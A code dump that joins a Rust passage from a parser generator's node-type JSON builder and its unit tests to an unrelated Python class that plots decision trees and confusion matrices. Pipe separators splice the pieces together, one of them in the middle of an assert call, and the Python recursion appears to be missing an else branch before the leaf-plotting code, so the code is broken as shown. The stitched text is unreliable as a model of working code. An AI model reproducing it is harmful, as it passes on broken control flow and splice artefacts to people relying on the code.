.children_without_fields
.quantity
.union(production_children_without_fields_quantity);
for (field_name, info) in variable_info.fields.iter_mut() {
did_change |= info.quantity.union(
production_field_quantities
.get(field_name)
.cloned()
.unwrap_or(ChildQuantity::zero()),
);
}
}
}
result[i] = variable_info;
}
all_initialized = true;
}
for supertype_symbol in &syntax_grammar.supertype_symbols {
if result[supertype_symbol.index].has_multi_step_production {
let variable = &syntax_grammar.variables[supertype_symbol.index];
return Err(Error::grammar(&format!(
"Supertype symbols must always have a single visible child, but `{}` can have multiple",
variable.name
)));
}
}
// Update all of the node type lists to eliminate hidden nodes.
for supertype_symbol in &syntax_grammar.supertype_symbols {
result[supertype_symbol.index]
.children
.types
.retain(child_type_is_visible);
}
for variable_info in result.iter_mut() {
for (_, field_info) in variable_info.fields.iter_mut() {
field_info.types.retain(child_type_is_visible);
}
variable_info.fields.retain(|_, v| !v.types.is_empty());
variable_info
.children_without_fields
.types
.retain(child_type_is_visible);
}
Ok(result)
}
pub(crate) fn generate_node_types_json(
syntax_grammar: &SyntaxGrammar,
lexical_grammar: &LexicalGrammar,
simple_aliases: &AliasMap,
variable_info: &Vec<VariableInfo>,
) -> Vec<NodeInfoJSON> {
let mut node_types_json = BTreeMap::new();
let child_type_to_node_type = |child_type: &ChildType| match child_type {
ChildType::Aliased(alias) => NodeTypeJSON {
kind: alias.value.clone(),
named: alias.is_named,
},
ChildType::Normal(symbol) => {
if let Some(alias) = simple_aliases.get(&symbol) {
NodeTypeJSON {
kind: alias.value.clone(),
named: alias.is_named,
}
} else {
match symbol.kind {
SymbolType::NonTerminal => {
let variable = &syntax_grammar.variables[symbol.index];
NodeTypeJSON {
kind: variable.name.clone(),
named: variable.kind != VariableType::Anonymous,
}
}
SymbolType::Terminal => {
let variable = &lexical_grammar.variables[symbol.index];
NodeTypeJSON {
kind: variable.name.clone(),
named: variable.kind != VariableType::Anonymous,
}
}
SymbolType::External => {
let variable = &syntax_grammar.external_tokens[symbol.index];
NodeTypeJSON {
kind: variable.name.clone(),
named: variable.kind != VariableType::Anonymous,
}
}
_ => panic!("Unexpected symbol type"),
}
}
}
};
let populate_field_info_json = |json: &mut FieldInfoJSON, info: &FieldInfo| {
if info.types.len() > 0 {
json.multiple |= info.quantity.multiple;
json.required &= info.quantity.required;
json.types
.extend(info.types.iter().map(child_type_to_node_type));
json.types.sort_unstable();
json.types.dedup();
} else {
json.required = false;
}
};
let mut aliases_by_symbol = HashMap::new();
for (symbol, alias) in simple_aliases {
aliases_by_symbol.insert(*symbol, {
let mut aliases = HashSet::new();
aliases.insert(Some(alias.clone()));
aliases
});
}
for variable in &syntax_grammar.variables {
for production in &variable.productions {
for step in &production.steps {
if !simple_aliases.contains_key(&step.symbol) {
aliases_by_symbol
.entry(step.symbol)
.or_insert(HashSet::new())
.insert(step.alias.clone());
}
}
}
}
aliases_by_symbol.insert(Symbol::non_terminal(0), [None].iter().cloned().collect());
let mut subtype_map = HashMap::new();
for (i, info) in variable_info.iter().enumerate() {
let symbol = Symbol::non_terminal(i);
let variable = &syntax_grammar.variables[i];
if syntax_grammar.supertype_symbols.contains(&symbol) {
let node_type_json =
node_types_json
.entry(variable.name.clone())
.or_insert_with(|| NodeInfoJSON {
kind: variable.name.clone(),
named: true,
fields: None,
children: None,
subtypes: None,
});
let mut subtypes = info
.children
.types
.iter()
.map(child_type_to_node_type)
.collect::<Vec<_>>();
subtype_map.insert(
NodeTypeJSON {
kind: node_type_json.kind.clone(),
named: true,
},
subtypes.clone(),
);
subtypes.sort_unstable();
subtypes.dedup();
node_type_json.subtypes = Some(subtypes);
} else if !syntax_grammar.variables_to_inline.contains(&symbol) {
// If a rule is aliased under multiple names, then its information
// contributes to multiple entries in the final JSON.
for alias in aliases_by_symbol
.get(&Symbol::non_terminal(i))
.unwrap_or(&HashSet::new())
{
let kind;
let is_named;
if let Some(alias) = alias {
kind = &alias.value;
is_named = alias.is_named;
} else if variable.kind.is_visible() {
kind = &variable.name;
is_named = variable.kind == VariableType::Named;
} else {
continue;
}
// There may already be an entry with this name, because multiple
// rules may be aliased with the same name.
let mut node_type_existed = true;
let node_type_json = node_types_json.entry(kind.clone()).or_insert_with(|| {
node_type_existed = false;
NodeInfoJSON {
kind: kind.clone(),
named: is_named,
fields: Some(BTreeMap::new()),
children: None,
subtypes: None,
}
});
let fields_json = node_type_json.fields.as_mut().unwrap();
for (new_field, field_info) in info.fields.iter() {
let field_json = fields_json.entry(new_field.clone()).or_insert_with(|| {
// If another rule is aliased with the same name, and does *not* have this field,
// then this field cannot be required.
let mut field_json = FieldInfoJSON::default();
if node_type_existed {
field_json.required = false;
}
field_json
});
populate_field_info_json(field_json, field_info);
}
// If another rule is aliased with the same name, any fields that aren't present in this
// cannot be required.
for (existing_field, field_json) in fields_json.iter_mut() {
if !info.fields.contains_key(existing_field) {
field_json.required = false;
}
}
populate_field_info_json(
node_type_json
.children
.get_or_insert(FieldInfoJSON::default()),
&info.children_without_fields,
);
}
}
}
for (_, node_type_json) in node_types_json.iter_mut() {
if node_type_json
.children
.as_ref()
.map_or(false, |c| c.types.is_empty())
{
node_type_json.children = None;
}
if let Some(children) = &mut node_type_json.children {
process_supertypes(children, &subtype_map);
}
if let Some(fields) = &mut node_type_json.fields {
for (_, field_info) in fields.iter_mut() {
process_supertypes(field_info, &subtype_map);
}
}
}
let mut anonymous_node_types = Vec::new();
let empty = HashSet::new();
let regular_tokens = lexical_grammar
.variables
.iter()
.enumerate()
.flat_map(|(i, variable)| {
aliases_by_symbol
.get(&Symbol::terminal(i))
.unwrap_or(&empty)
.iter()
.map(move |alias| {
if let Some(alias) = alias {
(&alias.value, alias.kind())
} else {
(&variable.name, variable.kind)
}
})
});
let external_tokens =
syntax_grammar
.external_tokens
.iter()
.enumerate()
.flat_map(|(i, token)| {
aliases_by_symbol
.get(&Symbol::external(i))
.unwrap_or(&empty)
.iter()
.map(move |alias| {
if let Some(alias) = alias {
(&alias.value, alias.kind())
} else {
(&token.name, token.kind)
}
})
});
for (name, kind) in regular_tokens.chain(external_tokens) {
match kind {
VariableType::Named => {
let node_type_json = node_types_json.entry(name.clone()).or_insert(NodeInfoJSON {
kind: name.clone(),
named: true,
fields: None,
children: None,
subtypes: None,
});
if let Some(children) = &mut node_type_json.children {
children.required = false;
}
if let Some(fields) = &mut node_type_json.fields {
for (_, field) in fields.iter_mut() {
field.required = false;
}
}
}
VariableType::Anonymous => anonymous_node_types.push(NodeInfoJSON {
kind: name.clone(),
named: false,
fields: None,
children: None,
subtypes: None,
}),
_ => {}
}
}
let mut result = node_types_json.into_iter().map(|e| e.1).collect::<Vec<_>>();
result.extend(anonymous_node_types.into_iter());
result.sort_unstable_by(|a, b| {
b.subtypes
.is_some()
.cmp(&a.subtypes.is_some())
.then_with(|| {
let a_is_leaf = a.children.is_none() && a.fields.is_none();
let b_is_leaf = b.children.is_none() && b.fields.is_none();
a_is_leaf.cmp(&b_is_leaf)
})
.then_with(|| a.kind.cmp(&b.kind))
});
result.dedup();
result
}
fn process_supertypes(
info: &mut FieldInfoJSON,
subtype_map: &HashMap<NodeTypeJSON, Vec<NodeTypeJSON>>,
) {
for (supertype, subtypes) in subtype_map {
if info.types.contains(supertype) {
info.types.retain(|t| !subtypes.contains(t));
}
}
}
fn variable_type_for_child_type(
child_type: &ChildType,
syntax_grammar: &SyntaxGrammar,
lexical_grammar: &LexicalGrammar,
) -> VariableType {
match child_type {
ChildType::Aliased(alias) => alias.kind(),
ChildType::Normal(symbol) => {
if syntax_grammar.supertype_symbols.contains(&symbol) {
VariableType::Named
} else if syntax_grammar.variables_to_inline.contains(&symbol) {
VariableType::Hidden
} else {
match symbol.kind {
SymbolType::NonTerminal => syntax_grammar.variables[symbol.index].kind,
SymbolType::Terminal => lexical_grammar.variables[symbol.index].kind,
SymbolType::External => syntax_grammar.external_tokens[symbol.index].kind,
_ => VariableType::Hidden,
}
}
}
}
}
fn extend_sorted<'a, T>(vec: &mut Vec<T>, values: impl IntoIterator<Item = &'a T>) -> bool
where
T: Clone + Eq + Ord,
T: 'a,
{
values.into_iter().any(|value| {
if let Err(i) = vec.binary_search(&value) {
vec.insert(i, value.clone());
true
} else {
false
}
})
}
#[cfg(test)]
mod tests {
use super::*;
use crate::generate::grammars::{
InputGrammar, LexicalVariable, Production, ProductionStep, SyntaxVariable, Variable,
};
use crate::generate::prepare_grammar::prepare_grammar;
use crate::generate::rules::Rule;
#[test]
fn test_node_types_simple() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "v1".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::field("f1".to_string(), Rule::named("v2")),
Rule::field("f2".to_string(), Rule::string(";")),
]),
},
Variable {
name: "v2".to_string(),
kind: VariableType::Named,
rule: Rule::string("x"),
},
],
});
assert_eq!(
node_types[0],
NodeInfoJSON {
kind: "v1".to_string(),
named: true,
subtypes: None,
children: None,
fields: Some(
vec![
(
"f1".to_string(),
FieldInfoJSON {
multiple: false,
required: true,
types: vec![NodeTypeJSON {
kind: "v2".to_string(),
named: true,
}]
}
),
(
"f2".to_string(),
FieldInfoJSON {
multiple: false,
required: true,
types: vec![NodeTypeJSON {
kind: ";".to_string(),
named: false,
}]
}
),
]
.into_iter()
.collect()
)
}
);
assert_eq!(
node_types[1],
NodeInfoJSON {
kind: ";".to_string(),
named: false,
subtypes: None,
children: None,
fields: None
}
);
assert_eq!(
node_types[2],
NodeInfoJSON {
kind: "v2".to_string(),
named: true,
subtypes: None,
children: None,
fields: None
}
);
}
#[test]
fn test_node_types_with_supertypes() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec!["_v2".to_string()],
variables: vec![
Variable {
name: "v1".to_string(),
kind: VariableType::Named,
rule: Rule::field("f1".to_string(), Rule::named("_v2")),
},
Variable {
name: "_v2".to_string(),
kind: VariableType::Hidden,
rule: Rule::choice(vec![
Rule::named("v3"),
Rule::named("v4"),
Rule::string("*"),
]),
},
Variable {
name: "v3".to_string(),
kind: VariableType::Named,
rule: Rule::string("x"),
},
Variable {
name: "v4".to_string(),
kind: VariableType::Named,
rule: Rule::string("y"),
},
],
});
assert_eq!(
node_types[0],
NodeInfoJSON {
kind: "_v2".to_string(),
named: true,
fields: None,
children: None,
subtypes: Some(vec![
NodeTypeJSON {
kind: "*".to_string(),
named: false,
},
NodeTypeJSON {
kind: "v3".to_string(),
named: true,
},
NodeTypeJSON {
kind: "v4".to_string(),
named: true,
},
]),
}
);
assert_eq!(
node_types[1],
NodeInfoJSON {
kind: "v1".to_string(),
named: true,
subtypes: None,
children: None,
fields: Some(
vec![(
"f1".to_string(),
FieldInfoJSON {
multiple: false,
required: true,
types: vec![NodeTypeJSON {
kind: "_v2".to_string(),
named: true,
}]
}
),]
.into_iter()
.collect()
)
}
);
}
#[test]
fn test_node_types_for_children_without_fields() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "v1".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::named("v2"),
Rule::field("f1".to_string(), Rule::named("v3")),
Rule::named("v4"),
]),
},
Variable {
name: "v2".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::string("{"),
Rule::choice(vec![Rule::named("v3"), Rule::Blank]),
Rule::string("}"),
]),
},
Variable {
name: "v3".to_string(),
kind: VariableType::Named,
rule: Rule::string("x"),
},
Variable {
name: "v4".to_string(),
kind: VariableType::Named,
rule: Rule::string("y"),
},
],
});
assert_eq!(
node_types[0],
NodeInfoJSON {
kind: "v1".to_string(),
named: true,
subtypes: None,
children: Some(FieldInfoJSON {
multiple: true,
required: true,
types: vec![
NodeTypeJSON {
kind: "v2".to_string(),
named: true,
},
NodeTypeJSON {
kind: "v4".to_string(),
named: true,
},
]
}),
fields: Some(
vec![(
"f1".to_string(),
FieldInfoJSON {
multiple: false,
required: true,
types: vec![NodeTypeJSON {
kind: "v3".to_string(),
named: true,
}]
}
),]
.into_iter()
.collect()
)
}
);
assert_eq!(
node_types[1],
NodeInfoJSON {
kind: "v2".to_string(),
named: true,
subtypes: None,
children: Some(FieldInfoJSON {
multiple: false,
required: false,
types: vec![NodeTypeJSON {
kind: "v3".to_string(),
named: true,
},]
}),
fields: Some(BTreeMap::new()),
}
);
}
#[test]
fn test_node_types_with_inlined_rules() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
word_token: None,
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: vec!["v2".to_string()],
supertype_symbols: vec![],
variables: vec![
Variable {
name: "v1".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![Rule::named("v2"), Rule::named("v3")]),
},
// v2 should not appear in the node types, since it is inlined
Variable {
name: "v2".to_string(),
kind: VariableType::Named,
rule: Rule::alias(Rule::string("a"), "x".to_string(), true),
},
Variable {
name: "v3".to_string(),
kind: VariableType::Named,
rule: Rule::string("b"),
},
],
});
assert_eq!( | node_types[0],
NodeInfoJSON {
kind: "v1".to_string(),
named: true,
subtypes: None,
children: Some(FieldInfoJSON {
multiple: true,
required: true,
types: vec![
NodeTypeJSON {
kind: "v3".to_string(),
named: true,
},
NodeTypeJSON {
kind: "x".to_string(),
named: true,
},
]
}),
fields: Some(BTreeMap::new()),
}
);
}
#[test]
fn test_node_types_for_aliased_nodes() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "thing".to_string(),
kind: VariableType::Named,
rule: Rule::choice(vec![Rule::named("type"), Rule::named("expression")]),
},
Variable {
name: "type".to_string(),
kind: VariableType::Named,
rule: Rule::choice(vec![
Rule::alias(
Rule::named("identifier"),
"type_identifier".to_string(),
true,
),
Rule::string("void"),
]),
},
Variable {
name: "expression".to_string(),
kind: VariableType::Named,
rule: Rule::choice(vec![
Rule::named("identifier"),
Rule::alias(
Rule::named("foo_identifier"),
"identifier".to_string(),
true,
),
]),
},
Variable {
name: "identifier".to_string(),
kind: VariableType::Named,
rule: Rule::pattern("\\w+"),
},
Variable {
name: "foo_identifier".to_string(),
kind: VariableType::Named,
rule: Rule::pattern("[\\w-]+"),
},
],
});
assert_eq!(node_types.iter().find(|t| t.kind == "foo_identifier"), None);
assert_eq!(
node_types.iter().find(|t| t.kind == "identifier"),
Some(&NodeInfoJSON {
kind: "identifier".to_string(),
named: true,
subtypes: None,
children: None,
fields: None,
})
);
assert_eq!(
node_types.iter().find(|t| t.kind == "type_identifier"),
Some(&NodeInfoJSON {
kind: "type_identifier".to_string(),
named: true,
subtypes: None,
children: None,
fields: None,
})
);
}
#[test]
fn test_node_types_with_multiple_valued_fields() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "a".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::choice(vec![
Rule::Blank,
Rule::repeat(Rule::field("f1".to_string(), Rule::named("b"))),
]),
Rule::repeat(Rule::named("c")),
]),
},
Variable {
name: "b".to_string(),
kind: VariableType::Named,
rule: Rule::string("b"),
},
Variable {
name: "c".to_string(),
kind: VariableType::Named,
rule: Rule::string("c"),
},
],
});
assert_eq!(
node_types[0],
NodeInfoJSON {
kind: "a".to_string(),
named: true,
subtypes: None,
children: Some(FieldInfoJSON {
multiple: true,
required: true,
types: vec![NodeTypeJSON {
kind: "c".to_string(),
named: true,
},]
}),
fields: Some(
vec![(
"f1".to_string(),
FieldInfoJSON {
multiple: true,
required: false,
types: vec![NodeTypeJSON {
kind: "b".to_string(),
named: true,
}]
}
)]
.into_iter()
.collect()
),
}
);
}
#[test]
fn test_node_types_with_fields_on_hidden_tokens() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![Variable {
name: "script".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::field("a".to_string(), Rule::pattern("hi")),
Rule::field("b".to_string(), Rule::pattern("bye")),
]),
}],
});
assert_eq!(
node_types,
[NodeInfoJSON {
kind: "script".to_string(),
named: true,
fields: Some(BTreeMap::new()),
children: None,
subtypes: None
}]
);
}
#[test]
fn test_node_types_with_multiple_rules_same_alias_name() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "script".to_string(),
kind: VariableType::Named,
rule: Rule::choice(vec![
Rule::named("a"),
// Rule `b` is aliased as rule `a`
Rule::alias(Rule::named("b"), "a".to_string(), true),
]),
},
Variable {
name: "a".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::field("f1".to_string(), Rule::string("1")),
Rule::field("f2".to_string(), Rule::string("2")),
]),
},
Variable {
name: "b".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::field("f2".to_string(), Rule::string("22")),
Rule::field("f2".to_string(), Rule::string("222")),
Rule::field("f3".to_string(), Rule::string("3")),
]),
},
],
});
assert_eq!(
&node_types
.iter()
.map(|t| t.kind.as_str())
.collect::<Vec<_>>(),
&["a", "script", "1", "2", "22", "222", "3"]
);
assert_eq!(
&node_types[0..2],
&[
// A combination of the types for `a` and `b`.
NodeInfoJSON {
kind: "a".to_string(),
named: true,
subtypes: None,
children: None,
fields: Some(
vec![
(
"f1".to_string(),
FieldInfoJSON {
multiple: false,
required: false,
types: vec![NodeTypeJSON {
kind: "1".to_string(),
named: false,
}]
}
),
(
"f2".to_string(),
FieldInfoJSON {
multiple: true,
required: true,
types: vec![
NodeTypeJSON {
kind: "2".to_string(),
named: false,
},
NodeTypeJSON {
kind: "22".to_string(),
named: false,
},
NodeTypeJSON {
kind: "222".to_string(),
named: false,
}
]
},
),
(
"f3".to_string(),
FieldInfoJSON {
multiple: false,
required: false,
types: vec![NodeTypeJSON {
kind: "3".to_string(),
named: false,
}]
}
),
]
.into_iter()
.collect()
),
},
NodeInfoJSON {
kind: "script".to_string(),
named: true,
subtypes: None,
// Only one node
children: Some(FieldInfoJSON {
multiple: false,
required: true,
types: vec![NodeTypeJSON {
kind: "a".to_string(),
named: true,
}]
}),
fields: Some(BTreeMap::new()),
}
]
);
}
#[test]
fn test_node_types_with_tokens_aliased_to_match_rules() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "a".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![Rule::named("b"), Rule::named("c")]),
},
// Ordinarily, `b` nodes have two named `c` children.
Variable {
name: "b".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![Rule::named("c"), Rule::string("B"), Rule::named("c")]),
},
Variable {
name: "c".to_string(),
kind: VariableType::Named,
rule: Rule::choice(vec![
Rule::string("C"),
// This token is aliased as a `b`, which will produce a `b` node
// with no children.
Rule::alias(Rule::string("D"), "b".to_string(), true),
]),
},
],
});
assert_eq!(
node_types.iter().map(|n| &n.kind).collect::<Vec<_>>(),
&["a", "b", "c", "B", "C"]
);
assert_eq!(
node_types[1],
NodeInfoJSON {
kind: "b".to_string(),
named: true,
subtypes: None,
children: Some(FieldInfoJSON {
multiple: true,
required: false,
types: vec![NodeTypeJSON {
kind: "c".to_string(),
named: true,
}]
}),
fields: Some(BTreeMap::new()),
}
);
}
#[test]
fn test_get_variable_info() {
let variable_info = get_variable_info(
&build_syntax_grammar(
vec![
// Required field `field1` has only one node type.
SyntaxVariable {
name: "rule0".to_string(),
kind: VariableType::Named,
productions: vec![Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(0)),
ProductionStep::new(Symbol::non_terminal(1))
.with_field_name("field1"),
],
}],
},
// Hidden node
SyntaxVariable {
name: "_rule1".to_string(),
kind: VariableType::Hidden,
productions: vec![Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::terminal(1))],
}],
},
// Optional field `field2` can have two possible node types.
SyntaxVariable {
name: "rule2".to_string(),
kind: VariableType::Named,
productions: vec![
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::terminal(0))],
},
Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(0)),
ProductionStep::new(Symbol::terminal(2))
.with_field_name("field2"),
],
},
Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(0)),
ProductionStep::new(Symbol::terminal(3))
.with_field_name("field2"),
],
},
],
},
],
vec![],
),
&build_lexical_grammar(),
&AliasMap::new(),
)
.unwrap();
assert_eq!(
variable_info[0].fields,
vec![(
"field1".to_string(),
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: true,
multiple: false,
},
types: vec![ChildType::Normal(Symbol::terminal(1))],
}
)]
.into_iter()
.collect::<HashMap<_, _>>()
);
assert_eq!(
variable_info[2].fields,
vec![(
"field2".to_string(),
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: false,
multiple: false,
},
types: vec![
ChildType::Normal(Symbol::terminal(2)),
ChildType::Normal(Symbol::terminal(3)),
],
}
)]
.into_iter()
.collect::<HashMap<_, _>>()
);
}
#[test]
fn test_get_variable_info_with_repetitions_inside_fields() {
let variable_info = get_variable_info(
&build_syntax_grammar(
vec![
// Field associated with a repetition.
SyntaxVariable {
name: "rule0".to_string(),
kind: VariableType::Named,
productions: vec![
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::non_terminal(1))
.with_field_name("field1")],
},
Production {
dynamic_precedence: 0,
steps: vec![],
},
],
},
// Repetition node
SyntaxVariable {
name: "_rule0_repeat".to_string(),
kind: VariableType::Hidden,
productions: vec![
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::terminal(1))],
},
Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::non_terminal(1)),
ProductionStep::new(Symbol::non_terminal(1)),
],
},
],
},
],
vec![],
),
&build_lexical_grammar(),
&AliasMap::new(),
)
.unwrap();
assert_eq!(
variable_info[0].fields,
vec![(
"field1".to_string(),
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: false,
multiple: true,
},
types: vec![ChildType::Normal(Symbol::terminal(1))],
}
)]
.into_iter()
.collect::<HashMap<_, _>>()
);
}
#[test]
fn test_get_variable_info_with_inherited_fields() {
let variable_info = get_variable_info(
&build_syntax_grammar(
vec![
SyntaxVariable {
name: "rule0".to_string(),
kind: VariableType::Named,
productions: vec![
Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(0)),
ProductionStep::new(Symbol::non_terminal(1)),
ProductionStep::new(Symbol::terminal(1)),
],
},
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::non_terminal(1))],
},
],
},
// Hidden node with fields
SyntaxVariable {
name: "_rule1".to_string(),
kind: VariableType::Hidden,
productions: vec![Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(2)).with_alias(".", false),
ProductionStep::new(Symbol::terminal(3)).with_field_name("field1"),
],
}],
},
],
vec![],
),
&build_lexical_grammar(),
&AliasMap::new(),
)
.unwrap();
assert_eq!(
variable_info[0].fields,
vec![(
"field1".to_string(),
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: true,
multiple: false,
},
types: vec![ChildType::Normal(Symbol::terminal(3))],
}
)]
.into_iter()
.collect::<HashMap<_, _>>()
);
assert_eq!(
variable_info[0].children_without_fields,
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: false,
multiple: true,
},
types: vec![
ChildType::Normal(Symbol::terminal(0)),
ChildType::Normal(Symbol::terminal(1)),
],
}
);
}
#[test]
fn test_get_variable_info_with_supertypes() {
let variable_info = get_variable_info(
&build_syntax_grammar(
vec![
SyntaxVariable {
name: "rule0".to_string(),
kind: VariableType::Named,
productions: vec![Production {
dynamic_precedence: 0,
steps: vec![
ProductionStep::new(Symbol::terminal(0)),
ProductionStep::new(Symbol::non_terminal(1))
.with_field_name("field1"),
ProductionStep::new(Symbol::terminal(1)),
],
}],
},
SyntaxVariable {
name: "_rule1".to_string(),
kind: VariableType::Hidden,
productions: vec![
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::terminal(2))],
},
Production {
dynamic_precedence: 0,
steps: vec![ProductionStep::new(Symbol::terminal(3))],
},
],
},
],
// _rule1 is a supertype
vec![Symbol::non_terminal(1)],
),
&build_lexical_grammar(),
&AliasMap::new(),
)
.unwrap();
assert_eq!(
variable_info[0].fields,
vec![(
"field1".to_string(),
FieldInfo {
quantity: ChildQuantity {
exists: true,
required: true,
multiple: false,
},
types: vec![ChildType::Normal(Symbol::non_terminal(1))],
}
)]
.into_iter()
.collect::<HashMap<_, _>>()
);
}
fn get_node_types(grammar: InputGrammar) -> Vec<NodeInfoJSON> {
let (syntax_grammar, lexical_grammar, _, simple_aliases) =
prepare_grammar(&grammar).unwrap();
let variable_info =
get_variable_info(&syntax_grammar, &lexical_grammar, &simple_aliases).unwrap();
generate_node_types_json(
&syntax_grammar,
&lexical_grammar,
&simple_aliases,
&variable_info,
)
}
fn build_syntax_grammar(
variables: Vec<SyntaxVariable>,
supertype_symbols: Vec<Symbol>,
) -> SyntaxGrammar {
let mut syntax_grammar = SyntaxGrammar::default();
syntax_grammar.variables = variables;
syntax_grammar.supertype_symbols = supertype_symbols;
syntax_grammar
}
fn build_lexical_grammar() -> LexicalGrammar {
let mut lexical_grammar = LexicalGrammar::default();
for i in 0..10 {
lexical_grammar.variables.push(LexicalVariable {
name: format!("token_{}", i),
kind: VariableType::Named,
implicit_precedence: 0,
start_state: 0,
});
}
lexical_grammar
}
} | |
plot_tree.py | import matplotlib.pyplot as plt
import seaborn as sns
class PlotTree():
def __init__(self,tree_class):
self._tree_class=tree_class
self._decision_node = dict(boxstyle="sawtooth", fc="0.8")
self._leaf_node = dict(boxstyle="round4", fc="0.8")
self._arrow_args = dict(arrowstyle="<-")
def __get_tree_depth(self,tree):
"""获取树的深度"""
depth = 0
# 定义的dict中首位储存的是节点信息,不计入计数
for key in ('Left', 'Right'):
# 记录各子节点的深度
sub_tree = tree[key]
if type(sub_tree).__name__ == "dict":
# 如果该节点有分支,迭代计算该节点的深度
thisdepth = self.__get_tree_depth(sub_tree)
else:
# 否则深度为一
thisdepth = 1
# 比较各分支深度,保留最深记录
if thisdepth > depth:
depth = thisdepth
# 分支深度加一即为当前节点深度
return depth + 1
def __plot_node(self,node_txt, cntr_pt, prnt_pt, node_type):
self._ax1.annotate(node_txt, xy=prnt_pt, xycoords='axes fraction',
xytext=cntr_pt, textcoords='axes fraction',
va="center", ha="center", bbox=node_type, arrowprops=self._arrow_args)
def __plot_mid_text(self,cntr_pt, prnt_pt, txt_string):
xMid = (prnt_pt[0] - cntr_pt[0]) / 2.0 + cntr_pt[0]
yMid = (prnt_pt[1] - cntr_pt[1]) / 2.0 + cntr_pt[1]
self._ax1.text(xMid, yMid, txt_string, va="center",
ha="center", rotation=30)
def __plot_tree(self,tree, prnt_pt, node_txt, branch=None):
self._layer += 1
diff = 1 / 2**(self._layer)
keys = list(tree.keys())
text = tree[keys[0]]
if branch == 'Left':
self._xOff -= diff
elif branch == 'Right':
self._xOff += diff
else:
pass
cntr_pt = (self._xOff, self._yOff)
self.__plot_mid_text(cntr_pt, prnt_pt, node_txt)
self.__plot_node(text, cntr_pt, prnt_pt, self._decision_node)
self._yOff = self._yOff - 1.0 / self._totalD
for key in keys[1:]:
sub_tree = tree[key]
if type(sub_tree).__name__ == 'dict':
self.__plot_tree(sub_tree, cntr_pt, str(key), key)
| if key == 'Left':
x = self._xOff - diff / 2
elif key == 'Right':
x = self._xOff + diff / 2
else:
pass
self.__plot_node(sub_tree, (x, self._yOff), cntr_pt, self._leaf_node)
self.__plot_mid_text((x, self._yOff), cntr_pt, str(key))
if branch == 'Left':
self._xOff += diff
elif branch == 'Right':
self._xOff -= diff
else:
pass
self._layer -= 1
self._yOff = self._yOff + 1.0 / self._totalD
def tree_structure_plot(self):
fig = plt.figure(1, facecolor='white')
fig.clf()
axprops = dict(xticks=[], yticks=[])
self._ax1 = plt.subplot(111, frameon=False, **axprops)
self._totalD = float(self.__get_tree_depth(self._tree_class.tree))
self._xOff = 0.5
self._yOff = 1.0
self._layer = 0
self.__plot_tree(self._tree_class.tree, (0.5, 1.0), '')
plt.show()
def confusion_matrix_plot(self):
mat=self._tree_class.confusion_matrix
if mat is None:
print("The confusion matrix is not computed. Please use 'test()' in 'DecisionTree' class to get it.")
else:
fig, ax = plt.subplots(figsize=(6, 6))
sns.heatmap(mat,xticklabels=mat.columns,yticklabels=mat.index,
cbar_kws={"shrink": .5}, ax=ax)
plt.tight_layout()
